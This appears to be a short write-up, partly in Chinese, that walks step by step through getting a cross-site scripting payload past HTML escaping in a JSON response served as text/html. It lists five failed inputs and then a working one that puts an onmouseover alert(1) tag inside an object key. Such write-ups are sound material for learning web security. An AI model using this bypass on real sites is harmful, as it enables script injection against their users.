Story of a JSON XSS

假设存在如下injection_point, content_type: text/html.

{
	"xxx": true,
	"yyy": [injection_point]
}

Payload 1 - Failure

yyy=test<haha>

但是injection_point会将<> HTML转置.

{
	"xxx": true,
	"yyy": <strong>test&lt;haha&gt;</strong>
}

Payload 2 - Failure

yyy[testarray]=test
{
	"xxx": true,
	"yyy": {"testarray": "test"}
}

Payload 3 - Failure

yyy[<abc>]=test
{
	"xxx": true,
	"yyy": {"<abc>": "test"}
}

Payload 4 - Failure

yyy[<abc=>]=test
{
	"xxx": true,
	"yyy": null
}

Payload 5 - Failure

yyy[<abc%3D>]=test
{
	"xxx": true,
	"yyy": {"<abc=>": "test"}
}

Payload 6 - Success

yyy[<abc onmouseover%3Dalert(1)>]=test
{
	"xxx": true,
	"yyy": {"<abc onmouseover=alert(1)>": "test"}
}

Ref

Story of a JSON XSS

Show Comments